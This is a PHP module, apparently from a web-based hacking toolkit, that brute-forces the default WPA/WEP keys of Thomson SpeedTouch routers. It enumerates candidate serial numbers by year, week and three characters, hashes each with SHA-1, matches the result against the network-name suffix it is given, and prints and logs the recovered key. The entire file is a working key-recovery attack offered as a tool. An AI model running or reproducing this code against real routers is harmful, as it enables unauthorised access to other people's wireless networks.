<?php
/*
Handler for Speedtouch Brute

ModGlue Variables:
$_CONTEXT['thc_sb']['log']
$_CONTEXT['thc_sb']['input']
$_CONTEXT['thc_sb']['offset']
$_CONTEXT['thc_sb']['charsetbase']
$_CONTEXT['thc_sb']['chars']
$_CONTEXT['thc_sb']['years']
$_CONTEXT['thc_sb']['years_amount']
$_CONTEXT['thc_sb']['charsetsid']
$_CONTEXT['thc_sb']['matches']
$_CONTEXT['thc_sb']['serial']
$_CONTEXT['thc_sb']['hash']
$_CONTEXT['thc_sb']['possiblekey']

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 21-05-2024
*/
// set variable to be able to save a task
$_MODULE_C = "thc_sb";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// log file for wpa/wep keys
$_CONTEXT['thc_sb'] = array();
$_CONTEXT['thc_sb']['log'] = $_PATHS['module_default_root']."/keys.txt";
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
if(isset($_POST['submit'])){
	switch($_POST['submit']){
		// attempt to bruteforce default wpa key
		case"Bruteforce":
		include_once("../../Includes/task_start.php");
		echo Screen($sOut,$_CONTEXT['verbose'],$_CONTEXT['silent']);
		break;
		// dump of cracked keys
		case"Dump File":
		echo Screen($sOut,$_CONTEXT['verbose'],$_CONTEXT['silent']);
		if(!function_exists("RawToArray")){
			include_once($_PATHS['functions_root']."/raw_to_array.php");
		}
		if(false==($aKeys = RawToArray($_CONTEXT['thc_sb']['log']))){
			echo Screen("<b id=h7>[no keys found yet]</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
		}
		else{
			for($x=0;$x<count($aKeys);$x++){
				echo Screen("<b>".date($_CONTEXT['time_pattern'].' H:i:s',$aKeys[$x][0])."</b> possible WPA or WEP key for <b>".$aKeys[$x][1]."</b> is <b>".$aKeys[$x][2]."</b><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
			}
		}
		echo Screen($sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']);
		exit;
		break;
		// clean logfile
		case"Truncate Log":
		if(!function_exists("WriteF")){
			$sDest = $_PATHS['functions_root']."/fwrite.php";
			(!IsThere($sDest) ? die("Can only overwrite logs if you have the write function <b>WriteF</b>") : include_once($sDest));
		}
		echo Screen($sOut.(WriteF($_CONTEXT['thc_sb']['log'],"","w")==true ? "Successfully deleted old entries." : "Failed to delete old entries.").$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']);
		exit;
		break;
		// just show index
		default:
		die(Screen($sOut.$sOptions.$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
	}
}
else{
	die(Screen($sOut.$sOptions.$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
echo Screen("<br>\n<b>Running..</b><p>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
flush();
ob_flush();
// let's bruteforce the wpa key
$_CONTEXT['thc_sb']['input'] = strtolower(strip_tags($_POST['sInput']));
$_CONTEXT['thc_sb']['offset'] = 40-(strlen($_CONTEXT['thc_sb']['input']));
$_CONTEXT['thc_sb']['charsetbase'] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$_CONTEXT['thc_sb']['chars'] = strlen($_CONTEXT['thc_sb']['charsetbase']);
// 200.
$_CONTEXT['thc_sb']['years'] = array(6,7,8,9);
$_CONTEXT['thc_sb']['years_amount'] = count($_CONTEXT['thc_sb']['years']);
$_CONTEXT['thc_sb']['charsetsid'] = "abcdef0123456789";
$_CONTEXT['thc_sb']['matches'] = 0;
// years
for($x=0;$x<$_CONTEXT['thc_sb']['years_amount'];$x++){
	// weeks
	for($y=1;$y<53;$y++){
		echo Screen("[20".(isset($_CONTEXT['thc_sb']['years'][$x][1]) ? "" : "0").$_CONTEXT['thc_sb']['years'][$x]."]: week ".$y."<br>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
		flush();
		ob_flush();
		$iCheck = $_CONTEXT['thc_sb']['matches'];
		// char 1
		for($a=0;$a<$_CONTEXT['thc_sb']['chars'];$a++){
			// char 2
			for($b=0;$b<$_CONTEXT['thc_sb']['chars'];$b++){
				// char 3
				for($c=0;$c<$_CONTEXT['thc_sb']['chars'];$c++){
					// see if we have a match
					$_CONTEXT['thc_sb']['serial'] = strtoupper(sprintf("CP%02d%02d%s",$_CONTEXT['thc_sb']['years'][$x],$y,base_convert(ord($_CONTEXT['thc_sb']['charsetbase'][$a]),10,16).base_convert(ord($_CONTEXT['thc_sb']['charsetbase'][$b]),10,16).base_convert(ord($_CONTEXT['thc_sb']['charsetbase'][$c]),10,16)));
					$_CONTEXT['thc_sb']['hash'] = sha1($_CONTEXT['thc_sb']['serial']);
					if(substr($_CONTEXT['thc_sb']['hash'],$_CONTEXT['thc_sb']['offset'])==$_CONTEXT['thc_sb']['input']){
						$_CONTEXT['thc_sb']['possiblekey'] = substr($_CONTEXT['thc_sb']['hash'],0,10);
						echo Screen($_CONTEXT['thc_sb']['hash'].":".$_CONTEXT['thc_sb']['serial']."<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
						echo Screen("<b id=h6>possible wpa/wep key for ".$_CONTEXT['thc_sb']['input'].":</b> ".$_CONTEXT['thc_sb']['possiblekey']."<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
						if($_CONTEXT['log']){
							WriteF($_CONTEXT['thc_sb']['log'],time()."|".$_CONTEXT['thc_sb']['input']."|".substr($_CONTEXT['thc_sb']['hash'],0,10)."\n");
						}
						$_CONTEXT['thc_sb']['matches']++;
					}
				}
			}
		}
		if($iCheck==$_CONTEXT['thc_sb']['matches']){
			echo Screen("<b id=h7>no keys for this week</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
		}
	}
}
echo Screen("<b>matches for ".$_CONTEXT['thc_sb']['input']."</b>: ".$_CONTEXT['thc_sb']['matches']." (running time) ".(time()-$_CONTEXT['start_task'])."(s)\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// update entry in background task file
include($_PATHS['includes_root']."/task_end.php");
echo Screen($sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']);
?>


